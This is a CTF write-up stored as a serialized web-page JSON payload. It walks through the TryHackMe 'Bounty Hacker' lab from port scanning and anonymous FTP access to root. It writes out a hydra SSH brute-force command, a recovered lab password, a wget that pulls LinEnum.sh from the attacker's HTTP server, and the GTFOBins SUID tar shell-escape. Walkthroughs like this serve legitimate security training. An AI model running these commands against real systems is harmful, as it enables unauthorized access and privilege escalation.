[{"data":1,"prerenderedAt":543},["ShallowReactive",2],{"\u002F2025\u002Ftryhackme-bountyhacker-writeup":3,"surround-\u002F2025\u002Ftryhackme-bountyhacker-writeup":534},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":9,"date":10,"updated":10,"image":11,"categories":12,"recommend":6,"draft":6,"readingTime":14,"body":19,"_type":527,"_id":528,"_source":529,"_file":530,"_stem":531,"_extension":532,"_original_dir":533},"\u002F2025\u002Ftryhackme-bountyhacker-writeup","2025",false,"","TryHackMe - Bounty Hacker","A detailed beginner's guide to the TryHackMe Bounty Hacker room: discovery with Nmap\u002FRustscan, anonymous FTP access, SSH brute-force with Hydra, and privilege escalation with SUID (tar).","2025-08-18T08:05:30.000Z","https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F1.jpg",[13],"CTF",{"text":15,"minutes":16,"time":17,"words":18},"2 min read",1.705,102300,341,{"type":20,"children":21,"toc":520},"root",[22,28,44,59,66,88,92,96,110,114,143,147,151,195,201,220,224,237,241,259,264,310,330,334,346,350,356,378,475,480,484,506,510,514],{"type":23,"tag":24,"props":25,"children":27},"element","pic",{"src":26},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F2.jpg",[],{"type":23,"tag":29,"props":30,"children":31},"p",{},[32,35],{"type":33,"value":34},"text","Target IP: ",{"type":23,"tag":36,"props":37,"children":41},"a",{"href":38,"rel":39},"https:\u002F\u002Ftryhackme.com\u002Froom\u002Fcowboyhacker",[40],"nofollow",[42],{"type":33,"value":43},"10.10.159.130",{"type":23,"tag":29,"props":45,"children":46},{},[47,49],{"type":33,"value":48},"Attacker IP: ",{"type":23,"tag":50,"props":51,"children":56},"span",{"className":52,"id":54,"style":55},[53],"example-info","just-like-this","color: #EA5B6F",[57],{"type":33,"value":58},"10.8.13.246",{"type":23,"tag":60,"props":61,"children":63},"h2",{"id":62},"reconnaissance",[64],{"type":33,"value":65},"Reconnaissance",{"type":23,"tag":29,"props":67,"children":68},{},[69,71,78,80,86],{"type":33,"value":70},"As a first step, let's run a port scan against our target. For speed, we first sweep all ports with ",{"type":23,"tag":72,"props":73,"children":75},"code",{"className":74},[],[76],{"type":33,"value":77},"rustscan",{"type":33,"value":79}," and then perform a detailed scan with ",{"type":23,"tag":72,"props":81,"children":83},{"className":82},[],[84],{"type":33,"value":85},"nmap",{"type":33,"value":87}," on the discovered ports.",{"type":23,"tag":24,"props":89,"children":91},{"src":90},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F3.jpg",[],{"type":23,"tag":24,"props":93,"children":95},{"src":94},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F4.jpg",[],{"type":23,"tag":29,"props":97,"children":98},{},[99,101,108],{"type":33,"value":100},"From the in-depth scan we identified an ",{"type":23,"tag":72,"props":102,"children":105},{"className":103,"id":54,"style":104},[53],"color: #4DFFBE",[106],{"type":33,"value":107},"anonymous",{"type":33,"value":109}," login on the FTP service. Let's log in to FTP as anonymous and see if we can find anything.",{"type":23,"tag":24,"props":111,"children":113},{"src":112},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F5.jpg",[],{"type":23,"tag":29,"props":115,"children":116},{},[117,119,125,127,133,135,141],{"type":33,"value":118},"We indeed have access to two files named ",{"type":23,"tag":72,"props":120,"children":122},{"className":121},[],[123],{"type":33,"value":124},"locks.txt",{"type":33,"value":126}," and ",{"type":23,"tag":72,"props":128,"children":130},{"className":129},[],[131],{"type":33,"value":132},"task.txt",{"type":33,"value":134},". Let's download them with ",{"type":23,"tag":72,"props":136,"children":138},{"className":137},[],[139],{"type":33,"value":140},"get",{"type":33,"value":142}," to our machine and inspect them locally.",{"type":23,"tag":24,"props":144,"children":146},{"src":145},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F6.jpg",[],{"type":23,"tag":24,"props":148,"children":150},{"src":149},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F7.jpg",[],{"type":23,"tag":29,"props":152,"children":153},{},[154,156,162,164,169,171,177,179,185,187,193],{"type":33,"value":155},"As seen, we have a ",{"type":23,"tag":72,"props":157,"children":160},{"className":158,"id":54,"style":159},[53],"color: #efb11d",[161],{"type":33,"value":124},{"type":33,"value":163}," file that I suspect contains passwords, and a ",{"type":23,"tag":72,"props":165,"children":167},{"className":166,"id":54,"style":159},[53],[168],{"type":33,"value":132},{"type":33,"value":170}," file that includes a user's request. We immediately notice that ",{"type":23,"tag":72,"props":172,"children":174},{"className":173},[],[175],{"type":33,"value":176},"ssh",{"type":33,"value":178}," is open on port ",{"type":23,"tag":72,"props":180,"children":182},{"className":181},[],[183],{"type":33,"value":184},"22",{"type":33,"value":186},". With this information, we can brute-force SSH using ",{"type":23,"tag":72,"props":188,"children":190},{"className":189},[],[191],{"type":33,"value":192},"hydra",{"type":33,"value":194},".",{"type":23,"tag":60,"props":196,"children":198},{"id":197},"initial-access",[199],{"type":33,"value":200},"Initial Access",{"type":23,"tag":29,"props":202,"children":203},{},[204,206,212,214,219],{"type":33,"value":205},"But first we need to find possible usernames. With a simple search, we have seven potential usernames. We extracted them from the website on port ",{"type":23,"tag":72,"props":207,"children":209},{"className":208},[],[210],{"type":33,"value":211},"80",{"type":33,"value":213}," and obtained one more from ",{"type":23,"tag":72,"props":215,"children":217},{"className":216},[],[218],{"type":33,"value":132},{"type":33,"value":194},{"type":23,"tag":24,"props":221,"children":223},{"src":222},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F8.jpg",[],{"type":23,"tag":29,"props":225,"children":226},{},[227,229,235],{"type":33,"value":228},"Now let's create a file containing the users with ",{"type":23,"tag":72,"props":230,"children":232},{"className":231},[],[233],{"type":33,"value":234},"vi users.txt",{"type":33,"value":236}," and add the usernames we found.",{"type":23,"tag":24,"props":238,"children":240},{"src":239},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F9.jpg",[],{"type":23,"tag":29,"props":242,"children":243},{},[244,246,251,253,258],{"type":33,"value":245},"Now we can brute-force ",{"type":23,"tag":72,"props":247,"children":249},{"className":248},[],[250],{"type":33,"value":176},{"type":33,"value":252}," with ",{"type":23,"tag":72,"props":254,"children":256},{"className":255},[],[257],{"type":33,"value":192},{"type":33,"value":194},{"type":23,"tag":260,"props":261,"children":263},"copy",{"code":262},"hydra -L users.txt -P locks.txt ssh:\u002F\u002F10.10.159.130",[],{"type":23,"tag":265,"props":266,"children":267},"ul",{},[268,282,294],{"type":23,"tag":269,"props":270,"children":271},"li",{},[272,274,280],{"type":33,"value":273},"With ",{"type":23,"tag":72,"props":275,"children":277},{"className":276},[],[278],{"type":33,"value":279},"-L",{"type":33,"value":281}," we provide the list of usernames to try.",{"type":23,"tag":269,"props":283,"children":284},{},[285,286,292],{"type":33,"value":273},{"type":23,"tag":72,"props":287,"children":289},{"className":288},[],[290],{"type":33,"value":291},"-P",{"type":33,"value":293}," we provide the passwords to try.",{"type":23,"tag":269,"props":295,"children":296},{},[297,298,304,306],{"type":33,"value":273},{"type":23,"tag":72,"props":299,"children":301},{"className":300},[],[302],{"type":33,"value":303},"ssh:\u002F\u002F10.10.159.130",{"type":33,"value":305}," we specify the service and the target.",{"type":23,"tag":24,"props":307,"children":309},{"src":308},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F10.jpg",[],{"type":23,"tag":29,"props":311,"children":312},{},[313,315,321,323,328],{"type":33,"value":314},"As shown, we discover the match ",{"type":23,"tag":72,"props":316,"children":318},{"className":317,"id":54,"style":104},[53],[319],{"type":33,"value":320},"lin:RedDr4gonSynd1cat3",{"type":33,"value":322},". Now let's log in over ",{"type":23,"tag":72,"props":324,"children":326},{"className":325},[],[327],{"type":33,"value":176},{"type":33,"value":329}," with these credentials.",{"type":23,"tag":24,"props":331,"children":333},{"src":332},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F11.jpg",[],{"type":23,"tag":29,"props":335,"children":336},{},[337,339,345],{"type":33,"value":338},"We logged in as ",{"type":23,"tag":72,"props":340,"children":342},{"className":341},[],[343],{"type":33,"value":344},"lin",{"type":33,"value":194},{"type":23,"tag":24,"props":347,"children":349},{"src":348},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F12.jpg",[],{"type":23,"tag":60,"props":351,"children":353},{"id":352},"privilege-escalation",[354],{"type":33,"value":355},"Privilege Escalation",{"type":23,"tag":29,"props":357,"children":358},{},[359,361,368,370,376],{"type":33,"value":360},"Now let's enumerate the machine to obtain root privileges. I will use the ",{"type":23,"tag":36,"props":362,"children":365},{"href":363,"rel":364},"https:\u002F\u002Fgithub.com\u002Frebootuser\u002FLinEnum\u002Fblob\u002Fmaster\u002FLinEnum.sh",[40],[366],{"type":33,"value":367},"linenum.sh",{"type":33,"value":369}," script for this. We'll download the script to our own machine and then use ",{"type":23,"tag":72,"props":371,"children":373},{"className":372},[],[374],{"type":33,"value":375},"python http.server",{"type":33,"value":377}," to transfer it to the target.",{"type":23,"tag":379,"props":380,"children":381},"ol",{},[382,426,447,459],{"type":23,"tag":269,"props":383,"children":384},{},[385,387,421,422],{"type":33,"value":386},"In the directory of our script, start the HTTP server with ",{"type":23,"tag":72,"props":388,"children":391},{"className":389,"language":390,"style":7},"language-bash shiki shiki-themes catppuccin-latte one-dark-pro","bash",[392,398,404,410,415],{"type":23,"tag":50,"props":393,"children":395},{"style":394},"--shiki-default:#1E66F5;--shiki-default-font-style:italic;--shiki-dark:#61AFEF;--shiki-dark-font-style:inherit",[396],{"type":33,"value":397},"sudo",{"type":23,"tag":50,"props":399,"children":401},{"style":400},"--shiki-default:#40A02B;--shiki-dark:#98C379",[402],{"type":33,"value":403}," python",{"type":23,"tag":50,"props":405,"children":407},{"style":406},"--shiki-default:#40A02B;--shiki-dark:#D19A66",[408],{"type":33,"value":409}," -m",{"type":23,"tag":50,"props":411,"children":412},{"style":400},[413],{"type":33,"value":414}," http.server",{"type":23,"tag":50,"props":416,"children":418},{"style":417},"--shiki-default:#FE640B;--shiki-dark:#D19A66",[419],{"type":33,"value":420}," 8080",{"type":33,"value":194},{"type":23,"tag":24,"props":423,"children":425},{"src":424},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F13.jpg",[],{"type":23,"tag":269,"props":427,"children":428},{},[429,431,437,439,445],{"type":33,"value":430},"Download the script with ",{"type":23,"tag":72,"props":432,"children":434},{"className":433},[],[435],{"type":33,"value":436},"wget 10.8.13.246:8080\u002FLinEnum.sh",{"type":33,"value":438},". (If you don't have write permission in the current directory, you can write to directories like ",{"type":23,"tag":72,"props":440,"children":442},{"className":441},[],[443],{"type":33,"value":444},"\u002Ftmp",{"type":33,"value":446},".)",{"type":23,"tag":269,"props":448,"children":449},{},[450,452,458],{"type":33,"value":451},"Grant the necessary permission with ",{"type":23,"tag":72,"props":453,"children":455},{"className":454},[],[456],{"type":33,"value":457},"chmod +x LinEnum.sh",{"type":33,"value":194},{"type":23,"tag":269,"props":460,"children":461},{},[462,464,470,471],{"type":33,"value":463},"Finally, run the script with ",{"type":23,"tag":72,"props":465,"children":467},{"className":466},[],[468],{"type":33,"value":469},".\u002FLinEnum.sh",{"type":33,"value":194},{"type":23,"tag":24,"props":472,"children":474},{"src":473},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F14.jpg",[],{"type":23,"tag":29,"props":476,"children":477},{},[478],{"type":33,"value":479},"This part of the output stands out. It shows there is a file with the SUID bit set.",{"type":23,"tag":24,"props":481,"children":483},{"src":482},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F15.jpg",[],{"type":23,"tag":29,"props":485,"children":486},{},[487,489,495,497,504],{"type":33,"value":488},"In our case, we can escalate privileges by leveraging ",{"type":23,"tag":72,"props":490,"children":492},{"className":491},[],[493],{"type":33,"value":494},"tar",{"type":33,"value":496}," with a crafted option. You can find such prepared commands on ",{"type":23,"tag":36,"props":498,"children":501},{"href":499,"rel":500},"https:\u002F\u002Fgtfobins.github.io\u002Fgtfobins\u002Ftar\u002F",[40],[502],{"type":33,"value":503},"GTFOBins",{"type":33,"value":505},". For our scenario, take the command for SUID, run it, and we will become root. (We must specify the full path to tar.)",{"type":23,"tag":260,"props":507,"children":509},{"code":508},"\u002Fbin\u002Ftar -cf \u002Fdev\u002Fnull \u002Fdev\u002Fnull --checkpoint=1 --checkpoint-action=exec=\u002Fbin\u002Fsh",[],{"type":23,"tag":24,"props":511,"children":513},{"src":512},"https:\u002F\u002Fhackpaper-image-server.pages.dev\u002Fimages\u002Fblogs\u002Ftryhackme-BountyHacker-writeup\u002F16.jpg",[],{"type":23,"tag":515,"props":516,"children":517},"style",{},[518],{"type":33,"value":519},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":7,"searchDepth":521,"depth":521,"links":522},4,[523,525,526],{"id":62,"depth":524,"text":65},2,{"id":197,"depth":524,"text":200},{"id":352,"depth":524,"text":355},"markdown","content:posts:2025:tryhackme-BountyHacker-writeup.md","content","posts\u002F2025\u002Ftryhackme-BountyHacker-writeup.md","posts\u002F2025\u002Ftryhackme-BountyHacker-writeup","md","\u002Fposts",[535,539],{"_path":536,"title":537,"date":538},"\u002F2025\u002Ftryhackme-rootme-writeup","TryHackMe - RootMe","2025-08-17T15:35:03.000Z",{"_path":540,"title":541,"date":542},"\u002F2025\u002Ftryhackme-agentsudo-writeup","TryHackMe - Agent Sudo","2025-08-19T11:07:27.000Z",1777022959357]